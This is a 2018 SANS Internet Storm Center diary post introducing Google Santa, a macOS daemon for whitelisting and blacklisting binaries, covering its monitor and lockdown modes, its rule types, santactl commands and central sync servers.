Threat Level: green Handler on Duty: Remco Verhoef

SANS ISC: Internet Storm Center - SANS Internet Storm Center Internet Storm Center

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Track naughty and nice binaries with Google Santa

Published: 2018-05-23
Last Updated: 2018-05-23 11:49:43 UTC
by Remco Verhoef (Version: 1)
0 comment(s)

Santa is a binary white- or blacklisting daemon, being developed by the Google Macintosh Operations Team (largest contributor is Russel Hancox) for over 4 years now (not an official Google product!). Google Santa is being used by Google to protect and monitor their macOS machines internally, and has been called Santa because it keeps track of binaries that are naugthy or nice. 

The application has two modes, monitor and lockdown mode. Monitor mode will keep track of each binary being executed, check it for matches against the blacklist and track all information it in the events database. The events will contain information about the signing chain, the parent name, the logged_in users, filepath, bundle version, executing user, sha256 hash and some additional information of the file being executed. In lockdown mode, only whitelisted binaries are allowed to run. For both white- and blacklisting you can use either path based (using the sha256 fingerprint) or certificate based rules. 

It is important to know that two immutable certificate rules are being created on launch, of santad and launchd. This prevents Santa from blocking criticial os binaries or santa components. Also be aware that scripts are not being checked against the lists. 

Santa consists of several daemons, a small gui and a santactl that will be used to communicate with the daemons. The black- and whitelists can be controlled using santactl:

# whitelist file on path
$ santactl rule --whitelist --path "/path/to/bundle/or/file"
# whitelist file on certificate
$ santactl rule --whitelist --certificate --path  "/path/to/bundle/or/file"

Using santactl you can also retrieve information about status, file information and sync progress. 

Corporate users will love sync, which allows central management of white- and blacklists. Generated events are uploaded to the sync server, allowing statistics and data on executed and blocked binaries. There are multiple opensource sync servers that can be used to manage lists and show events.

I'm a happy Google Santa user for a few years now, it gives me insights and control of the binaries that are being executed. There is much more to be told about this application, take a look at the docs for more information.


Keywords: mac os x whitelist
0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Malware Distributed via .slk Files
May 22nd 2018
1 day ago by Xme (2 comments)

Something Wicked this way comes
May 21st 2018
2 days ago by Rick (0 comments)

DASAN GPON home routers exploits in-the-wild
May 20th 2018
3 days ago by DidierStevens (5 comments)

Malicious Powershell Targeting UK Bank Customers
May 19th 2018
4 days ago by Xme (2 comments)

Anatomy of a Redis mining worm
May 18th 2018
5 days ago by Remco (0 comments)

Business Email Compromise incidents
May 18th 2018
5 days ago by Mark (2 comments)

Insecure Claymore Miner Management API Exploited in the Wild
May 18th 2018
5 days ago by Johannes (0 comments)

PCI DSS version 3.2.1 is out
May 18th 2018
6 days ago by Mark (0 comments)

View All Diaries →

Latest Discussions

NagiosXI 5.2.6 – 5.4.12 unauthenticated exploit chain leads to root access
created May 11th 2018
1 week ago by Remco (0 replies)

MinerPool Threat Feed info
created Apr 4th 2018
1 month ago by Anonymous (0 replies)

DShield on RPi returns no mySQL when running /home/pi/install/dshield/bin/
created Mar 29th 2018
1 month ago by nekton89 (0 replies)

Splunk: Any way to fetch logs via ssh
created Mar 15th 2018
2 months ago by Anonymous (2 replies)

Possible new worm activity
created Mar 13th 2018
2 months ago by Anonymous (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
10 months ago by Brad (6 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
9 months ago by Johannes (16 comments)

Second Google Chrome Extension Banker Malware in Two Weeks
Aug 29th 2017
8 months ago by Renato (0 comments)

Detection Lab: Visibility & Introspection for Defenders
Dec 15th 2017
5 months ago by Russ McRee (2 comments)

Maldoc with auto-updated link
Aug 17th 2017
9 months ago by Xme (2 comments)